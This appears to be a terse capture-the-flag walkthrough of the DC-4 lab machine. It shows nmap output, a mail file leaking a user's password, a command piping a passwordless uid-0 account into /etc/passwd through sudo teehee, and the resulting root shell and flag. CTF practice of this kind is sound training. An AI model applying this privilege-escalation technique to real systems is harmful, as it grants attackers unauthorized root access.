Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-17 04:55 CST Nmap scan report for10.10.10.131 Host is up (0.00030s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 20488d6057066c27e02f762ce642c001ba25 (RSA) | 256 e7838cd7bb84f32ee8a25f796f8e1930 (ECDSA) |_ 256 fd39478a5e58339973739e227f904f4b (ED25519) 80/tcp open http nginx 1.15.10 |_http-title: System Tools |_http-server-header: nginx/1.15.10 MAC Address: 08:00:27:3A:F7:4E (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds
jim@dc-4:/var/mail$ cat jim From charles@dc-4 Sat Apr 0621:15:462019 Return-path: <charles@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 201921:15:46 +1000 Received: from charles by dc-4 with local (Exim 4.89) (envelope-from <charles@dc-4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat, 06 Apr 201921:15:45 +1000 To: jim@dc-4 Subject: Holidays MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCjIX-0000kO-Qt@dc-4> From: Charles <charles@dc-4> Date: Sat, 06 Apr 201921:15:45 +1000 Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong. Password is: ^xHhA&hvim0y See ya, Charles
charles@dc-4:/usr/bin$ echo "leadlife::0:0:::/bin/bash" | sudo teehee -a /etc/passwd leadlife::0:0:::/bin/bash charles@dc-4:/usr/bin$ su leadlife root@dc-4:/usr/bin# id uid=0(root) gid=0(root) groups=0(root) root@dc-4:/usr/bin# cd /root root@dc-4:/root# ls flag.txt root@dc-4:/root# cat flag.txt
8888888888888888888b. 888888888888 888 o 888888888888"Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888888888888 88888P Y88888 8888888888888888888888888888888888888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888888888 .d88P Y88..88P 888888 Y8b. " "" " 888P Y888 "Y8888 888 888 8888888P""Y88P"888888"Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.